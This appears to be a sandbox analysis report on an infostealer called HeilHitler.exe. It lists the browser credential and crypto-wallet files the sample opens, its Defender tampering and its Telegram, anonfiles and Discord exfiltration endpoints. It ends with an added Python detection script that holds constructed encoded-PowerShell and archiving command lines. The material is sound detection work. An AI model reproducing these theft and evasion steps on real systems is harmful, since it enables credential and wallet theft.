              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
              Source: C:\Users\user\Desktop\HeilHitler.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: Yara matchFile source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.1680543056.0000028B92082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1680543056.0000028B92084000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.2017807345.000001BD43E2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: HeilHitler.exe PID: 7432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key, type: DROPPED
Source: Yara match | File source: Process Memory Space: HeilHitler.exe PID: 7448, type: MEMORYSTR
Source: C:\Users\user\Desktop\HeilHitler.exe | Code function: 1_2_00007FFDFAF42B5D (calls bind, WSAGetLastError)
MITRE ATT&CK matrix, one line per tactic. Techniques are listed in the order the matrix shows them; the bracketed number is the count the matrix attaches to a matched technique.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [241]; Native API [2]; Command and Scripting Interpreter [22]; PowerShell [3]; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [11]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools [4]; Deobfuscate/Decode Files or Information [11]; Obfuscated Files or Information [21]; Software Packing [11]; Timestomp [1]; DLL Side-Loading [1]; Virtualization/Sandbox Evasion [141]; Access Token Manipulation [1]; Process Injection [11]
Credential Access: OS Credential Dumping [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [2]; File and Directory Discovery [3]; System Information Discovery [47]; Security Software Discovery [151]; Process Discovery [2]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; System Network Configuration Discovery [1]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Local System [3]; Clipboard Data [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [3]; Encrypted Channel [21]; Non-Application Layer Protocol [4]; Application Layer Protocol [5]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Data Encrypted for Impact [1]; System Shutdown/Reboot [1]; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph (ID: 1556385; Sample: HeilHitler.exe; Start date: 15/11/2024; Architecture: WINDOWS; Score: 100). Node numbers are the graph's own; where the graph shows a number after a process name, it is kept in parentheses after the node number.

Start (node 2)
  DNS/IP: ip-api.com; discord.com
  Signatures: Found malware configuration; Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for submitted file; 9 other signatures
  Started: HeilHitler.exe (node 11, 22)

HeilHitler.exe (node 11, 22)
  Dropped: C:\Users\user\AppData\Local\Temp\...\rar.exe (PE32+); C:\Users\user\AppData\Local\...\rarreg.key (ASCII); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); 16 other files (none is malicious)
  Signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender; Tries to harvest and steal WLAN passwords; Removes signatures from Windows Defender
  Started: HeilHitler.exe (node 15, 105)

HeilHitler.exe (node 15, 105)
  DNS/IP: ip-api.com 208.95.112.1, ports 50936, 80, TUT-ASUS, United States; discord.com 162.159.128.233, ports 443, 50937, CLOUDFLARENETUS, United States
  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Modifies Windows Defender protection settings; 5 other signatures
  Started: cmd.exe (node 19, 1); cmd.exe (node 22, 1); cmd.exe (node 24); 23 other processes (node 26)

cmd.exe (node 19)
  Signatures: Suspicious powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy; 2 other signatures
  Started: conhost.exe (node 28); powershell.exe (node 31, 23)

cmd.exe (node 22)
  Signatures: Modifies Windows Defender protection settings; Removes signatures from Windows Defender
  Started: powershell.exe (node 33, 23); 2 other processes (node 44)

cmd.exe (node 24)
  Started: getmac.exe (node 35); conhost.exe (node 37)

23 other processes (node 26)
  Signatures: Tries to harvest and steal WLAN passwords
  Started: systeminfo.exe (node 39); powershell.exe (node 41); 44 other processes (node 46)

conhost.exe (node 28)
  Started: WmiPrvSE.exe (node 48)

powershell.exe (node 31)
  Signatures: Loading BitLocker PowerShell Module

getmac.exe (node 35)
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI

powershell.exe (node 41)
  Dropped: C:\Users\user\AppData\...\0qdpbrpq.cmdline (Unicode)
  Started: csc.exe (node 50)

44 other processes (node 46)
  Dropped: C:\Users\user\AppData\Local\Temp\8KaTn.zip (RAR)

csc.exe (node 50)
  Dropped: C:\Users\user\AppData\Local\...\0qdpbrpq.dll (PE32)
  Started: cvtres.exe (node 53)
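The parent-child chains in the behavior graph (HeilHitler.exe starting cmd.exe, which starts powershell.exe with an encoded, execution-policy-bypassing command line; powershell.exe starting csc.exe and cvtres.exe to compile a .cmdline file from the user's Temp directory; rar.exe running out of the PyInstaller _MEI extraction directory it was dropped into) are the relationships a detection engineer would turn into process-tree rules. The Python below is an added example for this page, not part of the Joe Sandbox report and not code from the sample: it replays constructed Sysmon-style process-creation events that follow those chains and flags them. PIDs 7432 and 7448 are the two HeilHitler.exe instances named in the report; every other PID, every command line, and the benign explorer.exe control chain are assumptions, since this report section lists no command lines.

```python
"""Process-tree rules modelled on the behavior graph above (added example)."""
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


# Constructed process-creation events (Sysmon event 1 style). Only PIDs 7432
# and 7448 come from the report; all other values are assumptions.
EVENTS: List[ProcEvent] = [
    ProcEvent(7432, 4321, r"C:\Users\user\Desktop\HeilHitler.exe", "HeilHitler.exe"),
    ProcEvent(7448, 7432, r"C:\Users\user\Desktop\HeilHitler.exe", "HeilHitler.exe"),
    ProcEvent(7500, 7448, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -ExecutionPolicy Bypass -EncodedCommand QQBkAGQALQBN"),
    ProcEvent(7510, 7500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -ExecutionPolicy Bypass -EncodedCommand QQBkAGQALQBN"),
    ProcEvent(7520, 7448, r"C:\Windows\System32\cmd.exe", "cmd.exe /c getmac"),
    ProcEvent(7530, 7520, r"C:\Windows\System32\getmac.exe", "getmac"),
    ProcEvent(7540, 7448, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoProfile -Command Add-Type -TypeDefinition $src"),
    ProcEvent(7550, 7540, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq.cmdline"'),
    ProcEvent(7560, 7550, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
              "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    ProcEvent(7600, 7448, r"C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe",
              r"rar.exe a -r -hpexample -m5 C:\Users\user\AppData\Local\Temp\8KaTn.zip C:\Users\user\AppData\Local\Temp\loot"),
    # Benign control: an unencoded admin script launched from explorer.exe.
    ProcEvent(8000, 2000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(8010, 8000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -NoProfile -File C:\Scripts\inventory.ps1"),
]

# Assumption: anything executing from under C:\Users is treated as user-writable.
USER_DIR_PREFIX = "c:\\users\\"


def _name(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _index(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestors(idx: Dict[int, ProcEvent], pid: int) -> Iterator[ProcEvent]:
    """Walk parent links upward; stops at unknown parents and guards against PID reuse loops."""
    seen = {pid}
    cur = idx.get(pid)
    while cur is not None and cur.ppid in idx and cur.ppid not in seen:
        cur = idx[cur.ppid]
        seen.add(cur.pid)
        yield cur


def has_encoded_command(cmdline: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    for tok in cmdline.split():
        if tok[0] in "-/" and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return True
    return False


def has_policy_bypass(cmdline: str) -> bool:
    """-ExecutionPolicy (or its -ep alias / any prefix of two or more letters) set to Bypass or Unrestricted."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok[1:].lower()
        if tok[0] in "-/" and len(t) >= 2 and (t == "ep" or "executionpolicy".startswith(t)):
            if toks[i + 1].lower() in ("bypass", "unrestricted"):
                return True
    return False


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs, in event order, for the three chains seen in the graph."""
    idx = _index(events)
    hits: List[Tuple[str, int]] = []
    for e in events:
        name = _name(e.image)
        parent = idx.get(e.ppid)
        under_user_binary = any(a.image.lower().startswith(USER_DIR_PREFIX) for a in ancestors(idx, e.pid))
        cl = e.cmdline.lower()
        # Rule 1: encoded or policy-bypassing PowerShell whose ancestry starts at a user-directory executable.
        if name == "powershell.exe" and under_user_binary and (has_encoded_command(e.cmdline) or has_policy_bypass(e.cmdline)):
            hits.append(("encoded_powershell_under_user_binary", e.pid))
        # Rule 2: C# compiler spawned by PowerShell, compiling a .cmdline response file from Temp (Add-Type pattern).
        if name == "csc.exe" and parent is not None and _name(parent.image) == "powershell.exe" \
                and "\\appdata\\local\\temp\\" in cl and ".cmdline" in cl:
            hits.append(("csc_compile_from_temp", e.pid))
        # Rule 3: rar.exe executing from a PyInstaller _MEI extraction directory under Temp.
        if name == "rar.exe" and "\\appdata\\local\\temp\\_mei" in e.image.lower():
            hits.append(("rar_from_pyinstaller_temp", e.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 1 deliberately matches on the switch prefix rather than the full `-EncodedCommand` spelling, because powershell.exe accepts `-e`, `-ec` and `-enc` and many detections that string-match the long form miss the short ones; rule 2 keys on the `.cmdline` response file because that is what `Add-Type` hands to csc.exe, regardless of the random base name.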

Submitted file (Source | Detection | Scanner | Label):
HeilHitler.exe | 47% | ReversingLabs | Win32.Trojan.Generic

Dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Temp\_MEI74322\VCRUNTIME140.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_ctypes.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_decimal.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_queue.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_socket.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_sqlite3.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\libcrypto-1_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\libffi-7.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\libssl-1_1.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\python310.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\sqlite3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI74322\unicodedata.pyd | 0% | ReversingLabs

No Antivirus matches
No Antivirus matches

URLs (Source | Detection | Scanner | Label):
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0 | 0% | Avira URL Cloud | safe
http://www.microsoftOWNLO~1.TXTy. | 0% | Avira URL Cloud | safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsC | 0% | Avira URL Cloud | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | (none) | high
discord.com | 162.159.128.233 | true | false | (none) | high
ip-api.com | 208.95.112.1 | true | false | (none) | high
URLs found in memory and binary data (Name | Source | Malicious | Reputation; the Antivirus Detection column is empty for every entry):
https://duckduckgo.com/chrome_newtab | Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/Blank-c/BlankOBF | Source: HeilHitler.exe, 00000001.00000003.1689251568.000001BD43570000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689605920.000001BD43351000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689683339.000001BD43570000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689516521.000001BD43569000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1689067447.000001BD4393E000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://api.telegram.org/bot%s/%s | Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.avito.ru/ | Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C7C000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://duckduckgo.com/ac/?q= | Source: HeilHitler.exe, 00000001.00000003.1906535342.000001BD43725000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | Source: HeilHitler.exe | Malicious: false | Reputation: high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | Source: HeilHitler.exe | Malicious: false | Reputation: high
http://www.microsoft.co | Source: powershell.exe, 00000026.00000002.1824448366.00000287197FB000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://python.org/dev/peps/pep-0263/ | Source: HeilHitler.exe, 00000001.00000002.2036487623.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp | Malicious: false | Reputation: high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | Source: HeilHitler.exe, 00000001.00000002.2022344283.000001BD40F50000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684747485.000001BD40F96000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.1684524728.000001BD40FF3000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.leboncoin.fr/ | Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://tools.ietf.org/html/rfc2388#section-4.4 | Source: HeilHitler.exe, 00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://weibo.com/ | Source: HeilHitler.exe, 00000001.00000003.1907250502.000001BD43701000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CC4000.00000004.00001000.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000003.2019563496.000001BD43701000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://api.anonfiles.com/upload | Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.msn.com | Source: HeilHitler.exe, 00000001.00000002.2032925274.000001BD44538000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://nuget.org/nuget.exe | Source: powershell.exe, 00000007.00000002.1824453418.0000026DC0C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871D05B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1887725142.000002872B769000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://discord.com/api/v9/users/ | Source: HeilHitler.exe, 00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963 | Source: HeilHitler.exe, 00000001.00000002.2031419097.000001BD43930000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: powershell.exe, 00000007.00000002.1766127413.0000026DB0C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1830812751.000002871B6F1000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://www.amazon.ca/ | Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43C60000.00000004.00001000.00020000.00000000.sdmp | Malicious: false | Reputation: high
